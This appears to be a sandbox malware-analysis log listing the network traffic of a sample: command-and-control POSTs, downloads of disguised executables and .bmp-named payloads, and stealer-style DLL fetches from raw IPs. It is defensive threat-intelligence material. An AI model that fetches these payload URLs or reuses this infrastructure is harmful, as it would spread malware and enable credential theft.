Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ndvkyttxqwhxxf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://abgkgapmosblami.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ossomjpytyqoa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://odidoedtaguftp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ycoewelqrxes.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gefbqpjwvko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ikqpprercanm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mfpyonubktjl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: nidoe.org

Source: unknown	TCP traffic detected without corresponding DNS query: 46.226.167.187
Source: unknown	TCP traffic detected without corresponding DNS query: 46.226.167.187
Source: unknown	TCP traffic detected without corresponding DNS query: 46.226.167.187
Source: unknown	TCP traffic detected without corresponding DNS query: 46.226.167.187
Source: unknown	TCP traffic detected without corresponding DNS query: 46.226.167.187
Source: unknown	TCP traffic detected without corresponding DNS query: 46.226.167.187
Source: unknown	TCP traffic detected without corresponding DNS query: 46.226.167.187
Source: unknown	TCP traffic detected without corresponding DNS query: 46.226.167.187
Source: unknown	TCP traffic detected without corresponding DNS query: 46.226.167.187
Source: unknown	TCP traffic detected without corresponding DNS query: 46.226.167.187
Source: unknown	TCP traffic detected without corresponding DNS query: 46.226.167.187
Source: unknown	TCP traffic detected without corresponding DNS query: 195.20.16.46
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.22
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.22
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.135
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.22
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.22
Source: unknown	TCP traffic detected without corresponding DNS query: 195.20.16.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.20.16.46
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.22
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.135
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.22
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.135
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 195.20.16.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.20.16.46
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.22
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.22
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.135
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.135
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.135
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.22
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.22
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.6
Source: unknown	TCP traffic detected without corresponding DNS query: 195.20.16.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.20.16.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.20.16.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.20.16.46

Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe

Code function: 5_2_0014E0A0 recv,setsockopt,closesocket,socket,connect,closesocket,

5_2_0014E0A0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/102.165.48.43 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: triedchicken.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: cybervincent.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ixef571134343/ef571134343/downloads/Start.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: bitbucket.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0a9ab821666277b5dd3929d09bffe743/7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: kilojagger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0a9ab821666277b5dd3929d09bffe743/cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: carthewasher.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bjhgvfd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: 294anacamptometer.sbsConnection: Keep-AliveCookie: _subid=2os9o961spv0l; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTE2MTM2OTl9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzExNjEzNjk5fSxcInRpbWVcIjoxNzExNjEzNjk5fSJ9.KHqIfUeldGCGZRbbj7rLIdUk1MeFJ0AXBEcAv6r9p8Q
Source: global traffic	HTTP traffic detected: GET /e14c6eb6-712a-4c2e-be84-37a1de2550e3/downloads/ddaff67e-23e9-45d6-b114-ae41de265d36/Start.exe?response-content-disposition=attachment%3B%20filename%3D%22Start.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAB3POAY3&Signature=3kDIIlaGVwgd2Exw7Puex%2FlGpQo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjELn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQDhHqaiQO5ftJoYENXqYI3qOUsxKtJmtL5TyDU8XRCQpgIhALTEr1oPjk5GlozLK44TJQxo2B9PWb3F8vt9A66nptTFKrACCNH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzjabjAh4jtdqFTXO8qhAKc%2FJCUi8r7C2rKpJ6nTOBKVhhNuTfp0qyzeYXq3z5zb1SOBopYqoPnADE6EcT5B63SdEanUmptHSjNoRDCfbaJATgqQMr2zoj8W7o%2BLo3H4Zg7DvK%2Fh3CfkFJIe3eIDeK5ugIsMz3MnRS9bNVX%2BcnAmrcAh%2BLT0z9IvvAxRjvFzYyLF%2FjD3GZJp1E2ykbjBzBreBe4mJ8QG%2FpJRnNX%2FzBOVs16I6JWDVjjNvkEjrr88qyKsqOC%2Bkq0Zql9hqo2bUEqWZB5IYTIBgns0vp2SnzyrfrU4EYav2Ocri113OUEwF%2BuqrzzIbJVlFlU%2BDZaiZ3JnC%2F8fsZb26UgILl75oPvRz55yTDWypSwBjqcAUsNXCnm%2F1yH8Tt9PM2FrdznncEhI8VB3%2FUWYkOw78tlqOIqDRNWTLh1OCJMAeCnMcCqejljL%2FrkTEa%2BDm%2Bbl4DnM9S%2BFv1NUD3keKurkqOpub1OaR34rpEANOAiBrWsHoegfz6J2mZQrWsZPo%2FVAtv9i0X472Wr4oV5dwAK6OvyCX4xw8dKzr2mFblnik%2FDvWIBi5kNW73qgBolRA%3D%3D&Expires=1711615070 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: monoblocked.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: d.392391234.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_676251329?hash=gdEXjFzqP4Hz4RjHrC6Ryb5BsQH3gXEoTcWHcSEbfh0&dl=n9WfEp2Oq35MoZGAEeTjZMvNYQeUp1Xgpi7NCn4nnYD&api=1&no_preview=1#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurKsySjR8YhvL7Ks3RZIJ4qJjfFMeqQgdrQ8&api=1&no_preview=1#ww12 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc329118071_676351514?hash=oPyw4gmGJJun6lU9sLErlqtdzmddNG56Nt55YfEENPc&dl=RCDwPdBUKrCPj7fUCgfOWpgDFGrhD5rBE6MQvUIUlHz&api=1&no_preview=1#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c237131/u329118071/docs/d54/a41cd49a4cc3/sm.bmp?extra=YhKLSKJ3mgzcHEPhKt29yMVwT7syu4DSX-r8FiniNu26GoYh--bacebk_lAweHd_nom6ZTYuZ1nbNqpT3z-oQcCb9yjZPvFkcjabKXHoUaPs7vLK8L7aMJYgb4R4exgpsuU8bf8kljG-Phg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_675792624?hash=XfyAKbRGjhzAxkfmvlCrdz9zJtdyzNRcHwmff3vnq80&dl=Ze3IH3BxY7vOa5jO9OGsVYOAjEXMtW2wRr8tC5P8SBE&api=1&no_preview=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909328/u329118071/docs/d30/0bb5ce760b73/XFilePumper.bmp?extra=LfaiwsuY5AI1SgCQ2hZu1AgxBMymxLFFBDyOdai5jngk90oTeFijtt7Ic4wsMIEOy9NwgH9QmImjTPk5bd8yAGOmRqX65U99IViGTY1ZCiw1fayo7Fo0G4owW8CZYZOPW10clBZcrnDnQ8o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_676351627?hash=Prtaj0ZgUNfFsiq7F7Grkvgpr1vjXL0n0VmegSdJgKX&dl=o8jO07ZxaFiNzZmXTClzRvzF7C8XmRKzZNeLFFTGXhX&api=1&no_preview=1#mene HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909218/u329118071/docs/d56/4889f8ef891f/crypted.bmp?extra=-LBKaniv3MRw05ku3d9Nr104OdGpfnHeS5WOM7N4VWIoDXtSDCsvx-PvX4usDvxD9PpMarCAxpv-2NOeS4PDQq1WB5ljz_YtSA7SRvFwbLxszvLa9N7DPL7VqJF6YMSwG6COqmXFKEg_y4Q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-22.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_676372534?hash=mU6chkoRzazMAQommLzbARbrOtVcQjV2nCZO5HLxzXD&dl=F4ujiRXkvZIoPyzlUTSDKXz4IzA9Z6pINj1zLZkzj5w&api=1&no_preview=1#a02 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cacheCookie: remixlang=3; remixstlid=9117847083090382120_GyCezWnUcFkAoaulqrTGNL6Wa7T5v9s33neHqUGXYzo; remixir=1
Source: global traffic	HTTP traffic detected: GET /c240331/u329118071/docs/d55/1831d7ba0e1f/crypted.bmp?extra=HVpBxhMcgZ3WEnQYJhUos_wUIgTD581u41drks9QawpVXgm6isoag9sFNXT6kFUNfmKUK0BATli7elFkZwxPtLGKC8Bc8453Aje1s8sxPwGBrTh5BDTLmWOuBUzVCNDrUBjJqzwS0s4DvCA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /c236331/u329118071/docs/d4/678b61126bd7/02.bmp?extra=u4x5o5e99u4NPac3pUrfyS7L46i-_X_MGUwFdXNYr1R5xwrrHeAQn1AOaKPAnboi5DP6qlx557JFMC-SX4vRmTo3ahIllC2PiaQqxxkkXoihUJfSh5X-gznnl4k0mxECRLjnx8NqK0MQ78M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: psv4.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1aFYp7.mp3 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /1pRXr7.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1BV4j7.mp4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Soft.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: centrosmissextensions.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Software.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: centrosmissextensions.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /widget/demo/102.165.48.43 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=102.165.48.43 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/102.165.48.43 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=102.165.48.43 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/102.165.48.43 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=102.165.48.43 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /widget/demo/102.165.48.43 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=102.165.48.43 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36If-Modified-Since: Mon, 25 Mar 2024 09:53:07 GMTIf-None-Match: "66014983-258600"Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Range: bytes=1024-If-Range: "6315a9f4-94750"Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Range: bytes=1024-If-Range: "6315a9f4-1f3950"Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/bing_release.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 46.226.167.187
Source: global traffic	HTTP traffic detected: GET /timeSync.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.6Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 195.20.16.46Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.22Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /data/pdf/june.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: act.fishoaks.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /getimage.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.22Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /gyhu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 176.113.115.135Cache-Control: no-cache
